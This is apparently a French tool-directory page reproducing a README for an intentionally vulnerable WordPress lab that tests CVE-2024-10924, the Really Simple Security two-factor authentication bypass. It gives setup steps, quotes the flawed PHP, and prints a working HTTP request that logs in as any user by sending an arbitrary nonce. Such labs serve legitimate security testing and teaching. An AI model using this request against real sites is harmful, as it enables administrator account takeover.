Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
wordpress-really-simple-security-authn-bypass-vulnerable-application — AVERTISSEMENT : Il s'agit d'une application vulnérable pour tester l'exploit du contournement d'authentification Really Simple Security < 9.1.2 (CVE-2024-10924). Exécutez-la à vos risques et périls ! | Kitploit
Outils/GitHubGitHub/m3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionAuthentificationLabs et Pratique
GitHubm3ssap0/wordpress-really-simple-security-authn-bypass-vulnerable-application

wordpress-really-simple-security-authn-bypass-vulnerable-application

AVERTISSEMENT : Il s'agit d'une application vulnérable pour tester l'exploit du contournement d'authentification Really Simple Security < 9.1.2 (CVE-2024-10924). Exécutez-la à vos risques et périls !

Voir le dépôt
81il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

wordpress-really-simple-security-authn-bypass-vulnerable-application

Ceci est une application vulnérable pour tester l'exploit du contournement d'authentification Really Simple Security < 9.1.2 (CVE-2024-10924).

ATTENTION !

Cette application contient de graves vulnérabilités de sécurité. Exécutez-la à vos risques et périls ! Il est recommandé d'utiliser un environnement sauvegardé et isolé (tel qu'une VM avec un instantané récent et un réseau host-only). Ne téléchargez pas cette application sur des serveurs accessibles depuis Internet, car ils seront compromis.

AVERTISSEMENT : Je ne peux être tenu responsable de la manière dont quelqu'un utilise cette application. Le seul but de cette application est d'être un scénario de test pour l'exploit du contournement d'authentification Really Simple Security < 9.1.2 (CVE-2024-10924) et elle ne doit pas être utilisée de manière malveillante. Si votre serveur est compromis via une installation de cette application, cela n'est pas de ma responsabilité, mais de celle de la ou des personnes qui l'ont téléchargée et installée.

Informations sur la vulnérabilité

  • CVE-ID: CVE-2024-10924
  • Lien: https://www.cve.org/CVERecord?id=CVE-2024-10924
  • Description: Cela permet à des attaquants non authentifiés de se connecter en tant que n'importe quel utilisateur existant du site, comme un administrateur, lorsque le paramètre "Authentification à deux facteurs" est activé (désactivé par défaut).
  • Correctif: https://plugins.trac.wordpress.org/changeset/3188431/really-simple-ssl
  • Bulletin Wordfence: https://www.wordfence.com/threat-intel/vulnerabilities/detail/really-simple-security-free-pro-and-pro-multisite-900-9111-authentication-bypass
  • Utilisation

    Voici les étapes pour configurer l'environnement :

    1. Lancez ./up.sh pour démarrer la composition.
    2. Terminez l'installation de WordPress ici : https://localhost:1337/wp-admin/install.php.
    3. Connectez-vous à WordPress.
    4. Allez dans 'Extensions' : https://localhost:1337/wp-admin/plugins.php.
    5. Cliquez sur 'Activer' sous l'extension 'Really Simple Security'. NE LA METTEZ PAS À JOUR, car nous avons besoin de la version vulnérable.
    6. Cliquez sur 'Annuler' dans la fenêtre contextuelle concernant l'activation SSL.
    7. Allez dans 'Réglages' > 'Protection de connexion' > 'Authentification à deux facteurs' et, dans la section 'Authentification à deux facteurs', activez 'Activer l'authentification à deux facteurs'.
    8. Cliquez sur le bouton 'Enregistrer'.

    Le conteneur sera nommé vuln-wp-really-simple-security.

    Pour démanteler l'environnement, utilisez la commande ./down.sh ou la commande ./down_and_delete.sh pour également supprimer les images et le volume de la base de données.

    Cause racine

    En examinant le correctif, il est possible de comprendre que dans la version vulnérable, un objet d'erreur était retourné, en cas de nonce de connexion invalide, par la fonction check_login_and_get_user(), sans interrompre toute l'opération.

    root@kitploit:~
    private function check_login_and_get_user( int $user_id, string $login_nonce ) {
        if ( ! Rsssl_Two_Fa_Authentication::verify_login_nonce( $user_id, $login_nonce ) ) {
            return new WP_REST_Response( array( 'error' => 'Invalid login nonce' ), 403 );
        }
    
        /**
         * Get the user by the user ID.
         *
         * @var WP_User $user
         */
        $user = get_user_by( 'id', $user_id );
        return $user;
    }
    

    Dans l'appelant, d'ailleurs, aucune vérification n'était effectuée sur la sortie de la fonction check_login_and_get_user() (ligne 277), mais on poursuivait simplement avec la fonction authenticate_and_redirect() (ligne 278) en utilisant la même valeur reçue en entrée pour l'ID utilisateur.

    root@kitploit:~
    public function skip_onboarding( WP_REST_Request $request ): WP_REST_Response {
    	$parameters = new Rsssl_Request_Parameters( $request );
    	// As a double we check the user_id with the login nonce.
    	$user = $this->check_login_and_get_user( (int)$parameters->user_id, $parameters->login_nonce );
    	return $this->authenticate_and_redirect( $parameters->user_id, $parameters->redirect_to );
    }
    

    Exploitation

    Pour exploiter la vulnérabilité, une requête comme la suivante est suffisante.

    root@kitploit:~
    POST /?rest_route=/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
    Host: localhost:1337
    Content-Type: application/json
    Content-Length: 88
    Connection: keep-alive
    
    {
        "user_id": 1,
        "login_nonce": "133333337",
        "redirect_to": "/wp-admin/"
    }
    

    Ensuite, définissez les cookies de session retournés en conséquence dans le navigateur.

    Le user_id doit être l'ID de l'utilisateur cible, le login_nonce peut être n'importe quoi car une valeur erronée ne bloquera pas le processus.

    Un script d'exploitation en Python peut être trouvé ici.

    Auteurs

    • Antonio Francesco Sardella - implémentation - m3ssap0

    Licence

    Ce projet est sous licence Unlicense - voir le fichier LICENSE pour plus de détails.

    Remerciements

    • István Márton, le chercheur en sécurité qui a découvert la vulnérabilité.
    Télécharger l’outil